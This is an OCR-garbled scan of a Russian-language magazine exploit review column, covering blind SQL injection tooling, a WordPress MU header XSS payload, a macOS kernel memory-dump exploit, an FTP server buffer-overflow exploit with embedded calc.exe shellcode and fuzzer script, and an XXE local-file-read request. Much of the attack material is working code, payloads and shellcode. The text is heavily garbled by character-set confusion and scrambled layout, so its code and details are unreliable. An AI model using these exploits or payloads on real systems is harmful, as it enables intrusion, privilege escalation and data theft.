$СехТ = ' ' ; // Текст, по которому будет определяться пра- 
вильность выполнения запроса 



6. Перейди в браузере по линку ШрУ/хост/каталог/таіп.рбр . 

Т.Ждем 30 секунду, при отсутствии каких-либо ошибок — закрываем 
браузер и надеемся на лучшее. 

8. Через несколько часов смотрим результат в файле гезиНЧхЕ 
Кстати! Помни, что время работы скрипта напрямую зависит от ширины 
канала твоего сервера, а также от нагрузки на атакуемую СУБД, т 

Конфигурируем инструмент для работы с ВІіпсІ ЗСИ-Іпіесбопз 



1^. сопііі^. рПр - Блокнот 


УѲИІ 


1 Файл Правка Формат Вид Справка 


□ 



// сосіесі Ьу Бгеу 
Версия: 3 . л 



у неболыіл 



небольшое руководство В конце файла. 



//— 

ІІІОВТ 



основные параметры (адрес сайта, порт, путь и т.д. )- 

' ' і // Адрес сайта 
Ірогт - ; // порт 



*ратР = 1 // путь до уязвимого скрипта (начиная с ѴО 

Іѵаг $ - // переменные (или содержимое куков если инъекция в куі 

// а затем т в конце* уязвимая переменная вместе с сущестеуюцим значеніе 
ІзсгепсІ - 1 // Символ комментария (’— +\ V/*’, '+ У, если нужен 

Іліе^Ьогі = * // (цифра): метод отправки данных 
//О - Р05Т; инъекция в перемни ой типе ЮЭТ 
// 1 - сет: инъекция в перемни ой типа сет 
// г - СЕТ/СООКІЕ; инъекция в СООКІЕ 

${уре * : // (0 или 1); тип распознания правильности выполнения вді зае 
// 0 - правильность запроса определяется по наличию текста который дол^ 
/у 1 - правильность запроса определяется по отсутствий текста (текста « 

(техт 

// 



// текст по которому будет определяться правильность еыполі 
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АНДРЕЙ «5КѴ02» КОМАРОВ 





ОБЗОр 

эксплоитов 




ОБЗОр 

эксплоитов 



ОБЗОр 
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ОБЭОр 


|\ 


ОБЭОр 


эксплоитов 


нА 


эксплоитов 



ОБЗОр 

эксплоитов 



ОБЗОр 

эксплоитов 




^ М МЕЖСАИТОВЫИ 
СКРИПТИНГ 

V I ВѴѴ0Р0РРЕ55МІІ 



>> Вгіе{ 



ѴѴогсІргезБ МІІ — версия известного блогосферного продукта, предна- 
значенного для организации бесчисленного числа блогов на одном 
движке (а также — на одном сервере]. Уязвимость была найдена в функ- 
ции сЬоо5е_ргітагу_Ыод (в составе ѵѵр-іпсІибез/ѵѵрти-Іипсбопз.рЬр]. 
Рассмотрим код сего творения. 

1830 ІипсСіоп сЬоозе_ргішагу_Ыод ( ) { 

1831 дІоЬаІ $сиггепС_изег ; 

1832 ?> 

1833 <СаЫе с1азз=»1огт-СаЫе>» 

1834 <Сг> 

1835 сСЪ. зсоре=»гоѵг»><?р1ір _е ( ' Ргітагу Віод' ) ; ?></ЦЪ> 

1836 <Сс1> 

1837 <?р1ір 



183 8 $а11_Ыодз = деС_Ыодз_о!_изег ( $сиггепС_ 

изег->ІБ ) ; 

1839 М ( соипС ( $а11_Ыодз ) > 1 ) { 

1848 } еізе { 

1849 есію $_8ЕКѴЕК [ 'НТТР_НОЗТ' ] ; 

1850 } 

1851 ?> 

1852 </Сс1> 

1853 </Сг> 

1854 </СаЫе> 

1855 <?р1ір 

1856 } 

Пристально взглянув на 1 849 строку, понимаем, что в наш запрос ксерверу 
можно внедрить что-нибудь вредоносное — например, сторонний НТМІ_/ 
35-код. Воссоздать та кую ситуацию реально с помощью НТТР-анализато- 
ров с возможностью обратного инжекта пакета, либо же ѴѴЕВ-проксей для 
проверки на безопасность приложений (ѴѴеЬЗсагаЬ, Вигрзиііе]. 



роцессфа 



ІпП^о РТР51те55 Гиггег ѵі.0 



Ргіе СолЛд АЪоиІ 

РТР СошішпОз 



у и$Ек 

у}\ 

У АВОЙ 
У АССТ 
У АНО 

У ДРРР 

* нозт 

У І-АЛО 
У! ПЗТ 

У мотм 
У мко 

* М1.8Т 

•іУ ил пс 



РА88 



ІІрсІаІе СЬапде 



П Ри 22 Ші5 РТР соштапй 



Сотгозпсі агд ит ет 
[йаск 



СопЛд 



КЕСѴ: 550 Ассем ѵіоіа^іоп аі: аскігезз 004А291С іп шосіиіе 
Т ОГТРрго*ехе' * Кеасі оГ асВДгеэз 00000001 

I СМ): [СШР] ТѴ22: [АААААААААААААААААААА] 5І2Е: 30 

ЕЕСѴ; 550 Ассезз ѵіоХаЪіоп аі асісігезз 00402А61 іп теніи Хе 
’СРТРрго^ехе' • МгіГе оГ асісігезз 00423А68 
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»Тагде*5: 



ѴѴогфгезз МІІ < 2.7 



» Ехріоід 



$ сигі -Н "Соокіе: " -Н «Нозк : <Ъосіу 

оп1оаб=а1егк ( Зкг іпд . кгошСкагСобе (88,83,83) )>" 

кккр : / /шт. ехатріе . сош/члгр-абтіп/ргокііе . рЪр» ктр . ккті 

$ кігекох ктр.ккті 



ік (п < 0) 

{ 

кргіпкк (зкбегг, " каііеб ІЗ 86_дек_1бк ( ) : %б\п" , п) ; 
гекигп (ЕХІТ_ЕАІЫЖЕ) ; 

} 

пит_безс = п; 

ргіпкк ( " І386_дек_1бк : пит_безс: %б\п" , пит_безс) ; 



»5оІиІіоп 



Про из водитель уже уведомлен о наличии бреши, но реакции пока не на- 
блюдается [читай одноименную статью в нашей рубрике и поймешь , 
что ШогбРгезз славится далеко не единой брешью , — Прим. РогЬ). 

АРРЬЕ МАС05ХХІЧІІ <= 1228.Х ЮСАЬ КЕРЫЕЬ 

МЕМОРУ 

0І5СІ.051ІВЕ 



» Вгіе{ 



Множественные целочисленные переполнения в функциях Арріе МасОВ 
позволяютс помощью специального системного вызова і386_5еМсІ1: или 
і386_де1;_ІсИ: повысить привилегии локальных пользователей. Нетрудно 
сделать вывод, что уязвимость может быть эксплуатированной исклю- 
чительно на ІпіеІ-ЬазесІ машинах. Не вдаваясь в подробности, скажу, что 
подобного рода уязвимость была обнаружена аж в 2005 году во РгееВВБ 
(и нечему тут удивляться, ведь ІІпіх-архитектура обеих систем консер- 
вативна). Такойже багбыл найден и сравнительно недавно, ноуже в 
МасОВ. Напомню, что существуеттри вида таблиц дескрипторов: гло- 
бальная таблица (одна в системе — СОТ), локальная таблица (может быть 
своя для каждой задачи), а также таблица дескрипторов прерываний. 
Локальная таблица (ЮТ) содержиттолько дескрипторы сегментов, шлю- 
зов задачи и вызовов. Сегмент недоступен задаче, если его дескриптора 
нетни в ЮТ, ни в СОТ (потому что локальная дескрипторная таблица 
описывается дескриптором глобальной таблицы). Основа виртуальной 
памяти системы Репбит состоит из двух таблиц: ЮТ и СОТ. 

Функция і386_деМсЙ возвращаетсписокдескрипторов, задействован- 
ных в ЮТ (І_осаІ БезспрЬгТаЫе) втекущий момент. Базовый синтаксис 
вызова описывается следующей функцией: 

#іпс1исіе <тасМпе/зедшепкз .Ь> 
ііпсіибе <тасМпе/зузагсЬ..1і> 

ІЗ 86_дек_1бк (іпк зкагк_зе1, ипіоп безсгірког 
*безсз, іпк пит_зе1з) ; 

Сообщив параметр экстремально большого размера, можно допустить 
копирование памяти ядра в пользовательское окружение. 



»ТагдеІ5| 



Арріе Мае ОВХ <10.5.6 



» Ехріоід 



Шр://тіІѵѵ0гт.сот/ехрІоіІ5/8108 

Ключевые фрагменты привожу ниже: 

#бекіпе ТМР_ЕІЬЕ " /ктр/хпи-дек_1бк " 

#бекіпе ЕЕАБ_ЗІ2Е 0x2 00 0000 

іпк 

шаіп (іпк агде , скаг **агдѵ) 

{ 

іпк кб, п, пит_безс; 
ѵоіеі *ркг ; 

п= І386_дек_1бк (0, ( ( іпк ) ШЬЬ) + 1, 0); 



кб = ореп ( 

ТМР_ЕІЬЕ, 0_СКЕАТ | 0_К ШК, 3_ІШЗК | 3_ІТО8Е) ; 
ік ( ксТ < 0) 

{ 

кргіпкк (зкбегг, " каііеб ореп () : %б\п" , кб) ; 
гекигп (ЕХІТ_ЕАІЫШЕ) ; 

} 

// шшар проецирует файлы или память устройств в память 
ркг = шшар (ШЬЪ, КЕАБ_ЗІ2Е, РКОТ_КЕАБ | РКОТ_ШІТЕ, 
МАР_АШЫ | МАР_РКІѴАТЕ, -1, 0); 
ік ( (іпк) ркг == -1) 

{ 

кргіпкк (зкбегг, " каііеб шшар () \п" ) ; 
гекигп (ЕХІТ_ЕАІЫШЕ) ; 

} 

// задание значения участку памяти, в данном случае — 
зануление КЕАБ_ЗІ2Е байт по адресу в ркг 
шешзек (ркг, 0x00, КЕАБ_ЗІ2Е) ; 

І386_дек_1бк (пшп_безс — 1, 

(ипіоп 1бк_епкгу *) ркг, - (пит_безс — 1) ) ; 

/ / дампим участок памяти в файл 
п = ѵлгіке (кб, ркг, КЕАБ_ЗІ2Е) ; 
шипшар (ркг, КЕАБ_ЗІ2Е) ; 
сіозе ( кб) ; 

ргіпкк ("%б-Ьукез ок кегпеі шешогу бишреб ко: %з\п" , 
п, ТМР_ЕІЬЕ) ; 
гекигп (ЕХІТ_ЗІІССЕЗЗ) ; 

} 



»5оІи1іоп 



Сейчас как раз идетактивное обсуждение решения. 

РІЛ_І_0І5СІ_05иКЕ 

МН0Г0ЧИСЛЕННЫЕУЯЗВИМ0СТИ в 
РТР-СЕРВЕРАХ. 



» Вгіел 



Одна из самых распространенных проблем безопасности будет отра- 
жена в этой заметке, а именно — Іиггіпд РТР-серверов. Сам процесс 



Вместо ѵѵіп32_ехес рауІоасГа мы могли бы выбрать что-нибудь более 
опасное, например, организациюудаленного шелла 
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5йѵйп( Ѵ*Ь 5 ииі Кіи слсэипЕсгсс) л ризЫсш йікі 
певЛі Іо скіів, Ѵа аге іону !ог Іііе ігсопѵвліяпсв. 



□ 



И «ее г (К* ЯчбІ» Ы йтйЫщ. іЬе ц^Іі^гтаЬогі уйи **«с ѵиикіпд оп 

ЩЦІіЬііиЕ. 

РІваіе ЕеІІ Місіаіоіі лЬоиІ Ий* рсоЫвп. 

^йКлѵв^^е^апеігмііс^і^уйиыпі^ Ѵ/е*і(и?зІ 
іЬіі нчюй ві сйіИвп&вІ алгі впйч^івиі. 



То і» гідід Йтв яг« гямЛ сяЫжй. сік*. Ьяв. 

Оф» I ІФЕ.ЯВВ»! ІГГЙЙІШІІ 



Эксплуатация уязвимости привела к исполнению саіс.ехе без ведома 
юльзователя 



фаззинга не раз уже описывался на страницахжурнала: по сути, это 
умышленное общение с сервисом с помощью аномальных запросов. 
Вспомним, что на самом деле РТР-протокол очень емок и насчитывает 
более ста команд. Соответственно, разработчики должны учесть их все 
в своих приложениях (а это оченьтрудоемкая задача] — устанавливать 
ограничение на вводимую длину создаваемой папки, контролируемую 
глубину пути и так далее. Для автоматизации процесса багоискатели 
пи шут л ибо собственные скрипты, либо полноценные приложения, 
вроде ІпНдо РТР Ри т.7. [ іпбдо.Ьг/Ыев/ІЧрІиггуір ]. Как правило, подобно- 
го рода уязвимости эксплуатируются после авторизации. Для этого 
можно заюзать апопутоііз-доступ, из-под которого и осуществлять 
проверки. Сюжет прост — фаззером сообщаются различные данные, 
а параллельно мы осуществляем мониторинг поведения приложения 
(ОІІуОЬд). Порой приложение не даетсебя дебажить и конфликтуете 
«О Ну». Чтобы решить проблему, попробуй использовать альтернатив- 
ный отладчик. РаиИМоп [ гезеагсЬ.ееѵе.сот/Ы:пп[/і:оо[5/ВТ20060801 -4. 
Ыщі) — утилита для выявления экспешнов в приложении и их коррект- 
ной работы. 

Для аттача процесса в ОІІуОЬд можно воспользоваться соответствую- 
щей вкладкой или использовать флаг - Р (с указанием РЮ процесса]. 
Аналогичный флаг присутствует и в ЕаиІШоп. Рассмотрим процесс 
анализа СоШеп ЕТРб. Аттачим процесс кдебаггеру и начинаем фаз- 
зинг по всем параметрам. Так как сервис привязан к запуску «внутри» 
О Ну, для более качественной отладки после креша предстоит играться 
с ОеЬид > Резіагі. Из-за переполнения входных данных по команде 
ІІ5ЕП мы выявили переполнение буфера, и значение ЕІР перезаписа- 
лось на 41414141 . 

Путем замеров выясняем, что переполнили буфер 3000 байтами. Далее 
требуется передатьуправление на шелл-код путем изменения адреса 
возврата. Кликаем правой кнопкой мыши в окне ОІІуОЬд: ОѵегКоѵѵ 
Реіигп Аббгезз А5СІІ ОѵегІЧоѵѵ геіигпз ЭеагсЬ бМР/СаІІ Е5Р. Когда 
эта процедура завершена, палим Ѵіеѵѵ -> Ьод, чтобы отследить распо- 
ложение «]тр езр», «саІІ езр» в процессе и связанных ОЫ. 

Теперь Ѵіеѵѵ-> ЕхесиІаЫе Мосіиіез — и по базе ОрСобеОВ в Меіазріоіі 
определяем адрес возврата: 0х750362с3 — \л/з2_32.сИ1 (орсобе — 
рор.рор.геі:]. Обнаружили, что данный адрес содержит рор.рор.геі. 

Так как они нужны нам, прибавляем единицу к адресу возврата, чтобы 
пропустить одну из команд рор (0х750362с4]. 

Мы можем воспользоваться готовым шелл-кодом ѵѵіп32_ехес из паке- 
та Меіазріоіі: ( рауіоасіз) : 

" \х31\хс9\х83\хе9\хб.Ь\хб.9\хее\хй9\х74\х24\хГ4\х5Ь\х81\х73\х13\хй8 " 

I \х22 \х72 \хе4 \х83 \хеЬ\хГс\хе2 \хГ4 \х2 4\хса\хЗ 4 \хе4\хс18 \х22 \хГ9 \ха1 " 

" \хе4\ха9\х0е\хе1\ха0\х23 \х9<і\хбТ\х97\хЗа\хГ9\хЬЬ\хГ8\х23\х99\х07 " 

" \хГ6\хбЬ\хГ9\хсі0\х53\х23 \х9с\хсі5\х18\хЬЬ\хсіе\хб0\х18\х5б\х75\х2 5 " 

" \х!2 \х2 Г\х73 \х2 6\хЗЗ \хб.б\х49\хЬ0\хТс\х2 6\х07\х07 \х53 \х7й\х56\хе5 " 




ОБЭОр 

эксплоитов 
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СШуВЪд - Злѵйпі.ема 



Р4е Ѵкѵі ОеЪид «ЗДюге Щпдом 

в|«|х] ►Ш «н|*ІІ иіііі -оі 



СРи - Щгеэіі ООООООЕ4 



-!□! XI 



Цеір 



ь|е|м|т|\ѵ1н|с|/|к|в|к|. 

^Щ|Х| 



Гг :н 4І4ННП 



ІЙ9СП 



оо во ее во ео о© ео 



іГРиі 



РРНЧТРТ 

ЕСХ 

ЕОХ ШШ 
ЕВХ Ѳ090442Ё 
Е'зР 1 щам 



С О 

Р * 

я о 

о 

5 о 







мк 


оошюо 


В&С6ЕА&С 


0^904428 






ЙСС6ЕЙМ 




ОК-Е.ЕЙГЗ 


«ЮШЙЙ 


О0С6ЕВ7С 


ѳѳѳѳѳвѳѳ 


ОСС6ЕЙ0О 


ѳвввѳввѳ 


0еСьЕй84 


С№©ЙОО0в 


(юсвЕйеа 


ооаооаоо 


ООСьЕЙ&С 


сюовоооо 


ООС-ьЕА-ХГ 









е$ адгз згьи « 

С* 0016 32ъч 
К 0023 32Ьи 
К Ѳ022 ЭаЬИ « 
Р5 оазв 32І>.( 
т и оодо ниш 

о о 

О в и*?Егг ИЗ«П01 

ЕЯ, 00010202 «но. НВ* 

ІК 



Й5СІ1 ^НЕЙО** 
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в 
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" \хЗЗ\х44\хГ9\хе8\х93\ха9\х2(3\хГ8\х<і9\хс9\хГ9\хГ8\х53\х23\х99\х6сі" 

" \х84\х0б\х7б\х27 \хе9\хе2 \х16\хбТ\х98\х12 \хГ7 \х24\хаО\х2(3\хГ9 \ха4 " 

" \хй4\ха9\х02\хГ8\х75\ха9\х1а\хес\х31\х29\х72\хе4\хй8\ха9\х32\х(і0 " 

" \хсМ\х5е\х72\хе4\хс1.8\ха9\х1а\х<38\х87\х13 \х84\х84\х8е\хс9\х7Т\х8с " 

" \х2 8\ха8\х7 6\хЬЬ\хЬ0\хЬа\х8с\хбе\хсі6\х75\х8сі\х03\х3 0\хсс\х8(і\х1Ь" 

" \х2 7\х41\х13 \х88\хЬЬ\х0с\х17\х9с\хЬсі\х22\х72\хе4 " 

# (3000 ЪуСез) 
зс = 'А' * 3000 

# саІаЩехе ЗЬеНсойе (172 ЬуТез ) 

зс += " \х31\хс9\х83\хе9\х<ТЬ\х(і9\хее\х(і9\х74\х24\хГ4\х5Ь\х81\х73\х13\х(і8 " 
зс += "\х22\х72\хе4\х83\хеЬ\хГс\хе2\хГ4\х24\хса\х34\хе4\хй8\х22\хТ9\ха1" 
зс += "\хе4\ха9\х0е\хеі\ха0\х23\х9(3\хбГ\х97\хЗа\хГ9\хЬЬ\хГ8\х23\х99\х07 " 
зс += " \хТ6\хбЬ\хГ9\хсі0\х53\х23\х9с\х<і5\х18\хЬЬ\х(іе\хб0\х18\х5б\х75\х25 " 
зс += " \х12\х2Т\х73\х26\хЗЗ\хсіб\х49\хЬ0\хГс\х2б\х07\х07\х53\х7(і\х5б\хе5 " 
зс += "\хЗЗ\х44\хГ9\хе8\х93\ха9\х2сі\хГ8\х(і9\хс9\хГ9\хТ8\х53\х23\х99\х6(і" 
зс += " \х84\х06\х76\х27\хе9\хе2\х1б\хбГ\х98\х12\хГ7\х24\ха0\х2(і\хТ9\ха4 " 
зс += " \хй4 \ха9 \х02 \хГ 8 \х7 5 \ха9 \х1а\хес \хЗ 1 \х2 9 \х7 2 \хе4 \хй8 \ха9 \хЗ 2 \хйО " 
зс += " \хйй\х5е\х72 \хе4 \хй8 \ха9 \х1а\хй8 \х87 \х13 \х84\х84\х8е\хс9 \х7 Т\х8с " 
зс += " \х28\ха8\х76\хЬЬ\хЬ0\хЬа\х8с\х6е\хсі6\х75\х8(і\х03\х30\хсс\х8(3\х1Ь" 
зс += "\х27\х41\х13\х88\хЬЬ\х0с\х17\х9с\хЬ<і\х22\х72\хе4" 

# Міпскжз 2000 8Р0 , 1 ,2 , 3 , 4 (рор,рор,геТ+1) = (рор,геТ) 

# ТЬапкз МеТазрІоіТ! 



геТигп_асІс1гезз= ' \хС5\х2А\х02\х75 ' 

ЪиГТезг = ' \хЕВ\хЗС ' + ' /' + зс + геТигп_асі(ігезз ♦ ' \г\п\г\п 1 
ргіпТ ЬглгГег 



Эксплойт готов! После его запуска и отправки соответствующего 
содержимого мы получим удаленное исполнение саіс.ехе на целевой 
машине. 

Устройство самого фаззера можно понять на простом примере. 
Воспользуемся вспомогательным средством апіірагзег [ апіірагзег. 
зоигееіогде.пеі ] — это АРІ, которое написано на РуіЬоп и позволяет 
создать специальные блоки данных для применения в фаззерах. Что 
же представляют собой эти блоки? 

арСІіаг ( ) — восьмибитный символ 

арСЗСгіпд ( ) — строка (как в языке С) , состоящая из знаков 
и заканчивающаяся нулевым символом 

арКеуѵтогсІз ( ) — список параметров , отделенных друг от 
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РІ — Ргоіосоі Іпіегргеіег 
ЦТР - Раш Тгапзіег Ргосе$8 

Оаіа соппесііоп і$ а Ьі-сИгесііопаІ ап<1 пеесі поі ехізі аіі Ше Ііте 

Схема работы РТР-протокола 



>1 іізег і 



>1 Рііе і 
I Зузкетп і 



друга специальным символом или другим блоком данных 
арЬопд ( ) — 32 -битное целое 
арЗТюгк ( ) — 16 -битное целое 

ар8бгіпд() — произвольная строка (ака «кгее когт 
зкгіпд») 

Наиболее интересен тип арКеуѵѵогсЫ). Последовательность, зада- 
ваемая им выглядиттак: [ключевое слово (например, команда РТР]] 
[разделитель] [блок данных (параметры к команде)] [сим вол конца 
блока]. Применительно к РТР можно сделатьтакой набросок: 

# импортируем все функции из модуля 
Егот апбірагзег ітрогб * 

# задаем список команд в качестве ключевых слов типа 
список 

СМБЫЗТ = ['АВОК', ' АЬЬО * , ' АРРЕ ' , ' СБІІР ' , ' ХСбР ' , 
'СТО', ’ХСТО', ' БЕЬЕ ' , ' НЕЬР ' , ' ЫЗТ ' , 'МКБ', ' ХМКБ ' , 
’МАСВ', 1 МСЮЕ ’ , 1 МТМБ 1 , ШЬЗТ', 'ШОР', ' РАЗЗ ' , 'РАЗУ, 
'РОКТ', ’РТО' , 1 ХРШ ' , 'ОШТ', ' КЕШ 1 , ' КЕТК * , ' КМБ ' , 

1 ХКМБ 1 , 1 КЕЗТ 1 , ' ШЕК', 1 КОТО 1 , ' ЗІТЕ ' , ' 8І2Е' # ' ЗТАТ', 
' ЗТОК ' , ' ЗТКІІ ' , ' ЗТОб ' , ' 8У8Т * , ' ТУРЕ ' , ' ІІЗЕК ' ] 

# задаем символ разделителя и завершающего знака 
8ЕРАКАТОК = " " 

ТЕРМ ШАТОК = " \г\п" 
ког стб іп СМБЫЗТ: 

# инициализируем АРІ 

Ар = апбірагзегО 

# настраиваем на режим со своими ключевыми словами 

стбкм = арКеучлгогбз ( ) 

# задаем слова, разделитель и завершающий символ 

стбкм. зекКеуѵтогбз ( [стб] ) 
стбкчл. зекЗерагаког (8ЕРАКАТОК) 
стбкчл. зекТегтіпаког (ТЕКМШАТОК) 

# чем будем фаззить, в качестве параметров к командам 



ЗеагсЫпд орсогіез 4 оМ 



ЕкесіШпд $еагсІі орегаііоп*.. 



А іоіа! оЕ 12 таісквз «еге Гоипгі: 

А«№ге$5 Орсойе МоОиІе 


05 Ѵепіолк 


0х71аа2461 бос еіі. рос еЬх* гві '.^ЗНвІв.ЛІ ДОіпгіомз ХР 5. 1,0.0 5Р0 №32) 
(5.1.2600.0) ШІПСІОЮ5 ХР 5. 1.1.0 5Р1 (ІА 32) 


0х 7 Іа а 32а 


БОБ еЬх, БОБ 85І , гві ■А'52ЬвІБ .сЕМ 
(5.1.2600.0) 


Шіпсіо^5 ХР 5. 1,0.0 2Р0 (ІА 32) 
Штс1о^5 ХР 5. 1,1.0 5Р1 (ІА 32) 


0х71аЬ22сК 


рэр еёі, рор еЬх, гві ^. 52 _ 3 - 2 сЛІ 
(5.1.2600.0) 


Шіпсіо^: ХР 5. 1,0.0 ЗР0 (ІА 32) 
ѴѴіпсіо^і ХР 5. 1,1.0 5Р1 (ІА 32) 


0х71аЬ23Ю 


рор еЬх, рор всіІ, гві 

(5.1.2600.0) 


ѴѴІпсіо^5 ХР 5. 1.0.0 5Р0 (ІА 32) 
ѴѴіпсІо^5 ХР 5, 1,1.0 5Р1 (ІА 32) 


0х71аЬ49Ы 


боб ебі. обо е&і, гві юг2 32 . 6 \\ 
(5.1.2600.0) 


МІПСІОЮ5 ХР 5, 1.0.0 5Р0 (ІА 32) 
Мпсіоюі ХР 5. 1,1.0 5Р1 (ІА 32) 


0х71аЬ5ЬЗв 


боб ебі. ооо еьі. гві м?2 32. с! II №іпс)ош5 ХР 5. 1,0.0 $Р0 (ІА 32) 
(5,1.2600.0) Мпйстэ ХР 5. 1.1.0 8Р1 (Ш2) 


0х71аЬ5сЗЬ 


вов е;і. ООО еЬх, гві ^52 32.611 Шіпеіом? ХР 5. 1.0.0 8Р0 (ІА32) 
(5.1.2600.0) Ѵ/ігиІО^ ХР 5. 1,1.0 $Р1 (ІД32) 


0х71аЬ5са7 


боб вгіі. ооо еёі. гві ѵузЗ 32.611 
(5.1.2600.0) 


Мтйоюз ХР 5. 1,0.0 5Р0 (ІА 32) 
ѴѴІБ^0^5 ХР 5, 1,1,0 ЗР1 (ІА32) 


0х71ав63(е 


боб 65 і. ООО еЬх. гві ^52 32.611 \ѴІПСІ0^Ѵ5 ХР 5. 1.0.0 5Р0 (ІА 32) 
(5.1.2600.0) ѴѴЫою$ ХР 5. 1,1.0 $Р1 (ІА32) 


0х7іаЬ8е4а боб е$і. ост вех. гві 32.СІІІ 

(5.1.2600.0) 


Ѵмгіпсі0^5 ХР 5. 1,0.0 $Р0 (ІА 32) 
ХР 5. 1,1.0 $Р1 (ІА 32) 




БОБ 05І. ООО вЬх, Гві ^$2ЬвІр.сІІ] 
(5.0.2134.1) 


Шіпсіомѵ^ 2000 5,0,0 .0 ЭР0 (ІА32) 
Шіпсіо^ 2000 5.0.1 .0 5Р1 (ІА32) 
Шіпсіо^з 2000 5,0.2 .0 5Р2 (ІА32) 
Шіпсіо^з 2000 5,0,3 .0 8РЗ (ІА32) 
2000 5.0.4 .0 5Р4 (ІА32) 


0x7 50 23 6Ы 


рор в5І| рор вЬх^ гві 

(5.0.2134.1) 


Шіпсіо^з 2000 5,0.0 .0 8Р0 (ІА 32) 
№ІПС(<Ш5 2000 5.0.1 .0 5Р1 (ІА32) 
2000 5.0.2 .0 5Р2 (ІА32) 



База опкодов Меіазрклі 



стбкм. зекСопкепк ( г»%п%п%п%п%п%п%п%п%п%п%п%») 

# делаем так , чтобы генерируемые блоки данных варьирова- 
лись по размеру с нарастанием до 65536 байт 
стбкм. зекМобе ( ' іпсгетепкаі ' ) 
стбкчл. зекМахЗіге (6553 6) 
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.тогіо. мдДОеѵгіорек/Іодіп.рЬр' 



*] 




: помощью таких инструментов, как ННр-АпаІугег или плагин к Могіііа 
"атрегЬаІа, очень удобно проводить атаки на заголовки 




ЫЕХТАРР 

ЕСНОХМЬ 

ІШЕСТІОЫ 




» ВпеЦ 



Одна из неочевидных и интересных атак. Пример сценария: от клиен- 
та отправляются ХМИ-данные, поступают на сторону приложения, где 
обрабатываются ХМІ_-парсером. 

Типичный запрос: 



ссііепк-теззаде хт1пз=»]іккр : / /ѵллалн пехкарр . 
сот/ргос!искз/есЬ.о2 /с1ітзд>> кгапз-іс!=»3» 
косиз=»с_2 5»хтеззаде-рагк хт1пз=>»> ргосеззог=»Е 
скюРгорегкуІІрс1аке»хргорегку сотропепк-іс!=»с_25» 
пате=»кехк»>аа</ргорегкухргорегку сотропепк- 
іс!=»с_2 5» пате=»кюгІ20пка13сго11» ѵа1ие=»0»/хргорегку 
сотропепк-іс!=»с_2 5» пате=»ѵегкіса18сго11» 
ѵа1ие=»0»/х/теззаде-рагкхтеззаде-рагк хт1пз=>>» 
ргосеззог=»ЕскюАскіоп»хаскіоп сотропепк-ісІ=»с_2 5» 
пате=»аскіоп»/х/теззаде-рагкх/с1іепк-теззаде> 



ар . аррепсі ( стсікѵ/) 

# шлем всю картину на указанный хост и порт с помощью 
сокетов 

зоск = арЗоскек ( ) 

зоск . соппеск (НОЗТ , РОЕТ) 

ргіпк зоск. гесѵ (1024) 

зоск. зепсІТСР (ар . декРауІоасі ( ) ) 

ргіпк зоск. гесѵ (1024) 

зоск. сіозе 

Отмечены все доступные методы для «общения». Тестирование выявило 
затруднения при обработке СѴѴ0/С01ІР. «Ассеззѵіоіабоп» представляет 
ситуацию, когда приложение пытается прочитать участок памяти, которого 
не существует (характерная ошибка — «РеабоЫ. Вторая ошибка связана 
с записью в участок памяти («ѴѴгіке ко») , который был недоступен, либо 
приложение не имело привилегий для записи. Для отслеживания такого 
рода ошибоктребуется выставить флажки в ОНуйбд (Орііопз ОеЬиддіпд 
-> Орбопз Ехсерііопз) «МетогуАссезз ѴіоІаНюп», «Зіпдіе 5іер Вгеак». 



»ТагдеІз| 



Выявленные та ким способом уязвимости: 

•ѴѴіпРТР 2.3.0 

Передача аномального параметра в команде Ы5Т (Ы5Т *<строка>]. Поз- 
воляет перезаписать агбкагу-память [ Ыір ://т і ІѵѵОгт .сот/ехр1оИ:5/7875 ) . 

• ОиіШРТРсІ РТРБегѵегѴегзіоп О.х.х 

Обход ограничения безопасности по команде РЕВЕТЕ (ЬйрѴ/тіІѵѵОгт. 
сот/ехрІоіІз/8200 ]. 

Можетбыть осуществлено с применением техник б ігесЬгу ІтаѵегзаіДѴ.). 

• ѴѴРТРР Ехріогег Рго 1 .0 

Переполнение кучи [ Шр://тіІ\л/0гт.сот/ехрІоіІз/7913 І. 

• 5егѵ-ІІ 7.4.0. 1 

Неавторизированное создание произвольных директорий [ Ыір :// 

ті[уѵ0гт.сопп/ехр[оі1:5/821 11 . 

Вдобавок, следует понимать, что неразумное использование 
экстремально больших параметров иногда приводит к отказу в 
обслуживании сервиса. Этот продукт, к сожалению, не исключе- 
ние. При сообщении большого числа (свыше 2000] команд 5МІЧТ 
после авторизации — происходит аварийное завершение работы 
сервиса. 



Вредоносный запрос: 

<?хш1 ѵегзіоп=»1 . 0»?х ! БОСТУРЕ зес [<!ЕБЕМЕ]ХГТ зес 
іШУх ! ЕБТІТУ шукезкепкіку ЗУ8ТЕМ " кііе : / / /с : \Ъоок . 
іпі " >] > 

Интересность в том, что языковыми средствами языка ХМ И злоумыш- 
ленник может продекларировать новый объект. Тот, в свою очередь, 
объявит объект, содержащий ЬооЕіпі, на который можно будет сослать- 
ся в ХМИ-запросе. 



>>ТагдеІз| 



ІЧехіАрр Есбо <2.1.1 



|>> ЕхрІоКз| 



Ьир://ті[уѵ0гт.сопп/ехр[ок5/8191 

Код запроса представлен выше, инжект такого ХМИ-гедиевЕа может 
быть выполнен с помощью средств 65/НТТР-Р05Т. 

УЯЗВИМОСТИ В ФУНКЦИЯХ РТ5_* 

В ЫВС (НТТР://МІІ_ѴѴоКМ.СОМ/ 
ЕХРІ_0ІТ5/8і6з). 

Здесь мы видим некорректную обработку исключительных ситуаций 
при длинном пути. Набор функций Кз занимается отображением 
иерархии файловой системы И N IX — 1Тр_ореп() возвращает хэндл на 
файловую иерархию, и он может быть «скормлен» одной из следующих 
функций: 

• Кз_геасі — возвращаетуказатель на структуру, описывающую один 
из элементов файловой иерархии; 

• Кз_сЫШгеп() возвращаетуказатель на список структур, каждая из 
которых описывает один из файлов внутри дочерней директории. 
Обратимся кструктуре, описывающей иерархию: 

куресіек зкгисі _ккзепк { 

ипзідпесі зкюгк ккз_іпко; /* флаги на ЕТЗЕБТ-структуру*/ 

скаг * ккз_ассракЬ.; /* путь доступа */ 

скаг *ккз_ракЬ.; /* текущий каталог */ 

зіге_к ккз_ракЫеп; /* зкгіеп (ккз_ракк) */ 

скаг *ккз_пате; /* имя файла */ 

зіге_к ккз_паше1еп; /* зкгіеп (ккз_паше) */ 

зкюгк ккз_1еѵе1; /* глубина иерархии (-1 до Б) */ 
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іпР РРз_еггпо; /* исключения */ 

Іопд РРз_пшпЪег; /* нумерованное значение */ 
ѵоій *РРз_роіпРег ; /* локальный адрес в памяти */ 
зРгисР _РРзепР *РРз_рагепР; /* родительская дирек- 
тория */ 

зРгисР _РРзепР *РРз_1іпк; /* следующая файловая 
структура */ 

